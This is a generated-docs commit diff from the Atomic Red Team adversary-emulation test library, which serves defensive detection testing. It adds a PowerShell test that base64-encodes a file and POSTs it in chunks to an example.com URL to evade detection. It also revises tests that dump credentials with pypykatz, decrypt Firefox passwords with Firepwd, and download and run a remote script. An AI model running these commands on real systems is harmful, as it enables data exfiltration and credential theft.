Generated docs from job=generate-docs branch=master [ci skip]

2024-02-26 15:24:49 +00:00
parent c09d2a3748
commit e9b9f2ed7b
17 changed files with 451 additions and 262 deletions
@@ -1900,6 +1900,7 @@ exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh
 exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
 exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
 exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
+exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
@@ -1244,6 +1244,7 @@ exfiltration,T1041,Exfiltration Over C2 Channel,2,Text Based Data Exfiltration u
 exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
 exfiltration,T1567.003,Exfiltration Over Web Service: Exfiltration to Text Storage Sites,1,Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows),c2e8ab6e-431e-460a-a2aa-3bc6a32022e3,powershell
 exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
+exfiltration,T1030,Data Transfer Size Limits,2,Network-Based Data Transfer in Small Chunks,f0287b58-f4bc-40f6-87eb-692e126e7f8f,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
@@ -2736,6 +2736,7 @@
  - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
 - [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
  - Atomic Test #1: Data Transfer Size Limits [macos, linux]
+  - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows]
 - T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
@@ -1835,7 +1835,8 @@
  - Atomic Test #1: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) [windows]
 - [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
  - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
- T1030 Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
+  - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows]
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
  - Atomic Test #2: Exfiltration Over Alternative Protocol - ICMP [windows]
@@ -15,7 +15,7 @@
 | Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Software Deployment Tools](../../T1072/T1072.md) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [Network Share Discovery](../../T1135/T1135.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Inter-Process Communication](../../T1559/T1559.md) | [Office Application Startup](../../T1137/T1137.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | [System Information Discovery](../../T1082/T1082.md) | [Lateral Tool Transfer](../../T1570/T1570.md) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution: Print Processors](../../T1547.012/T1547.012.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Service Session Hijacking: RDP Hijacking](../../T1563.002/T1563.002.md) | [Data from Local System](../../T1005/T1005.md) | [Data Transfer Size Limits](../../T1030/T1030.md) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
 | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | [Thread Execution Hijacking](../../T1055.003/T1055.003.md) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Application Window Discovery](../../T1010/T1010.md) | [Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
 | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup: Add-ins](../../T1137.006/T1137.006.md) | [Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
 | Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md) | [Server Software Component: Transport Agent](../../T1505.002/T1505.002.md) | [Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |  | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
@@ -52301,7 +52301,8 @@ execution:
          which_python=$(which python || which python3 || which python3.9 || which python2)
          $which_python -c 'import requests;import os;url = "#{script_url}";malicious_command = "#{executor} #{payload_file_name} #{script_args}";session = requests.session();source = session.get(url).content;fd = open("#{payload_file_name}", "wb+");fd.write(source);fd.close();os.system(malicious_command)'
        name: sh
-        cleanup_command: "rm #{payload_file_name} \n"
+        cleanup_command: "rm #{payload_file_name} \npip-autoremove pypykatz >nul 2>
+          nul\n"
    - name: Execute Python via scripts
      auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
      description: Create Python file (.py) that downloads and executes shell script
@@ -82666,44 +82667,51 @@ credential-access:
        elevation_required: true
    - name: Registry parse with pypykatz
      auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
-      description: 'Parses registry hives to obtain stored credentials
+      description: |
+        Parses registry hives to obtain stored credentials.

-        '
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
      supported_platforms:
      - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_002
+      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "Python 3 must be installed manually"
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
-      - description: 'Computer must have pip installed
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
+          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'echo "PIP must be installed manually"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }

          '
-      - description: 'pypykatz must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"

          '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null

          '
      executor:
-        command: 'pypykatz live registry
-
-          '
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
        name: command_prompt
        elevation_required: true
    - name: esentutl.exe SAM copy
@@ -85630,14 +85638,16 @@ credential-access:
      auto_generated_guid: dc9cd677-c70f-4df5-bd1c-f114af3c2381
      description: "Firepwd.py is a script that can decrypt Mozilla (Thunderbird,
        Firefox) passwords.\nUpon successful execution, the decrypted credentials
-        will be output to a text file, as well as displayed on screen. \n"
+        will be output to a text file, as well as displayed on screen. \n\nWill create
+        a Python virtual environment within the External Payloads folder that can
+        be deleted manually post test execution.\n"
      supported_platforms:
      - windows
      input_arguments:
        Firepwd_Path:
          description: Filepath for Firepwd.py
          type: string
-          default: PathToAtomicsFolder\..\ExternalPayloads\Firepwd.py
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004\Scripts\Firepwd.py
        Out_Filepath:
          description: Filepath to output results to
          type: string
@@ -85650,17 +85660,12 @@ credential-access:
          description: Filepath to python
          type: string
          default: C:\Program Files\Python310\python.exe
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1555.004
      dependency_executor_name: powershell
      dependencies:
-      - description: 'Firepwd must exist at #{Firepwd_Path}
-
-          '
-        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
-
-          '
-        get_prereq_command: |
-          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
-          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
      - description: 'Firefox profile directory must be present

          '
@@ -85696,36 +85701,52 @@ credential-access:
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Pip must be installed.
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip -v) {exit 0} else {exit 1}
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }
+
+          '
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: 'Firepwd must exist at #{Firepwd_Path}
+
+          '
+        prereq_command: 'if (Test-Path "#{Firepwd_Path}") {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
+          Invoke-WebRequest "https://raw.githubusercontent.com/lclevy/firepwd/167eabf3b88d5a7ba8b8bc427283f827b6885982/firepwd.py" -outfile "#{Firepwd_Path}"
      - description: "Pycryptodome library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pycryptodome) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq"}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pycryptodome) {exit
+          0} else {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}"){#{venv_path}\Scripts\pip.exe
+          install pycryptodome | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" |
+          out-null} else {write-host "Visual Studio Build Tools (C++ Support) must
+          be installed to continue gathering this prereq"}
+
+          '
      - description: "Pyasn1 library must be installed \n"
-        prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (pip show pyasn1) {exit 0} else {exit 1}
-        get_prereq_command: |
-          $env:Path = [System.Environment]::ExpandEnvironmentVariables([System.Environment]::GetEnvironmentVariable("Path","Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path","User"))
-          if (test-path "#{VS_CMD_Path}"){pip install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null} else {write-host "Visual Studio Build Tools (C++ Support) must be installed to continue gathering this prereq."}
+        prereq_command: 'if (#{venv_path}\Scripts\pip.exe show pyasn1) {exit 0} else
+          {exit 1}
+
+          '
+        get_prereq_command: 'if (test-path "#{VS_CMD_Path}") & {#{venv_path}\Scripts\pip.exe
+          install pyasn1 | out-null | cmd /c %comspec% /k "#{VS_CMD_Path}" | out-null}
+          else {write-host "Visual Studio Build Tools (C++ Support) must be installed
+          to continue gathering this prereq."}
+
+          '
      executor:
        name: powershell
        command: |
          $PasswordDBLocation = get-childitem -path "$env:appdata\Mozilla\Firefox\Profiles\*.default-release\"
-          cmd /c #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
+          cmd /c #{venv_path}\Scripts\python.exe #{Firepwd_Path} -d $PasswordDBLocation > #{Out_Filepath}
          cat #{Out_Filepath}
        cleanup_command: "Remove-Item -Path \"#{Out_Filepath}\" -erroraction silentlycontinue
          \  \n"
@@ -87023,42 +87044,50 @@ credential-access:
        Python 3 must be installed, use the get_prereq_command's to meet the prerequisites for this test.

        Successful execution of this test will display multiple usernames and passwords/hashes to the screen.
+
+        Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
      supported_platforms:
      - windows
-      dependency_executor_name: command_prompt
+      input_arguments:
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1003_001
+      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: |
-          py -3 --version >nul 2>&1
-          exit /b %errorlevel%
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }
+
+          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: |
-          py -3 -m pip --version >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'pypykatz must be installed and part of PATH
+        prereq_command: 'if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit
+          1 }

          '
-        prereq_command: |
-          pypykatz -h >nul 2>&1
-          exit /b %errorlevel%
-        get_prereq_command: 'pip install pypykatz
+        get_prereq_command: 'py -m venv "#{venv_path}"
+
+          '
+      - description: "pypykatz must be installed \n"
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          pypykatz 2>&1 | Out-Null

          '
      executor:
-        command: 'pypykatz live lsa
+        command: "\"#{venv_path}\\Scripts\\pypykatz\" live lsa \n"
+        cleanup_command: 'del "%temp%\nanodump.dmp" > nul 2> nul

          '
        name: command_prompt
@@ -99594,40 +99623,47 @@ discovery:
          description: hostname or ip address to connect to.
          type: string
          default: 192.168.1.1
+        venv_path:
+          description: Path to the folder for the tactics venv
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\venv_t1018
      dependency_executor_name: powershell
      dependencies:
      - description: 'Computer must have python 3 installed

          '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
        get_prereq_command: |
          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
          invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
          Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
-      - description: 'Computer must have pip installed
+      - description: 'Computer must have venv configured at #{venv_path}

          '
-        prereq_command: 'if (pip3 -V) {exit 0} else {exit 1}
+        prereq_command: 'if (Test-Path -Path "#{venv_path}" ) { exit 0 } else { exit
+          1 }

          '
-        get_prereq_command: "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\"
-          -ErrorAction ignore -Force | Out-Null\ninvoke-webrequest \"https://bootstrap.pypa.io/ez_setup.py\"
-          -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"      \ninvoke-webrequest
-          \"https://bootstrap.pypa.io/get-pip.py\" -outfile \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\ncmd
-          /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\ez_setup.py\"\ncmd /c \"PathToAtomicsFolder\\..\\ExternalPayloads\\get-pip.py\"\n"
-      - description: 'adidnsdump must be installed and part of PATH
+        get_prereq_command: 'py -m venv "#{venv_path}"

          '
-        prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1}
+      - description: 'adidnsdump must be installed

          '
-        get_prereq_command: 'pip3 install adidnsdump
+        prereq_command: 'if (Get-Command "#{venv_path}\Scripts\adidnsdump" -errorAction
+          SilentlyContinue) { exit 0 } else { exit 1 }
+
+          '
+        get_prereq_command: '& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir
+          adidnsdump 2>&1 | Out-Null

          '
      executor:
-        command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name}
+        command: '"#{venv_path}\Scripts\adidnsdump" -u #{user_name} -p #{acct_pass}
+          --print-zones #{host_name}

          '
        name: command_prompt
@@ -100068,7 +100104,8 @@ discovery:
      - description: 'Check if python exists on the machine

          '
-        prereq_command: 'if (python --version) {exit 0} else {exit 1}
+        prereq_command: 'if (Get-Command py -errorAction SilentlyContinue) { exit
+          0 } else { exit 1 }

          '
        get_prereq_command: |
@@ -112282,6 +112319,38 @@ exfiltration:

          '
        name: sh
+    - name: Network-Based Data Transfer in Small Chunks
+      auto_generated_guid: f0287b58-f4bc-40f6-87eb-692e126e7f8f
+      description: Simulate transferring data over a network in small chunks to evade
+        detection.
+      supported_platforms:
+      - windows
+      input_arguments:
+        source_file_path:
+          description: Path to the source file to transfer.
+          type: path
+          default: "[User specified]"
+        destination_url:
+          description: URL of the destination server.
+          type: url
+          default: http://example.com
+        chunk_size:
+          description: Size of each data chunk (in KB).
+          type: integer
+          default: 1024
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $file = [System.IO.File]::OpenRead(#{source_file_path})
+          $chunkSize = #{chunk_size} * 1KB
+          $buffer = New-Object Byte[] $chunkSize
+
+          while ($bytesRead = $file.Read($buffer, 0, $buffer.Length)) {
+              $encodedChunk = [Convert]::ToBase64String($buffer, 0, $bytesRead)
+              Invoke-WebRequest -Uri #{destination_url} -Method Post -Body $encodedChunk
+          }
+          $file.Close()
  T1537:
    technique:
      x_mitre_platforms:
@@ -30298,7 +30298,8 @@ execution:
          which_python=$(which python || which python3 || which python3.9 || which python2)
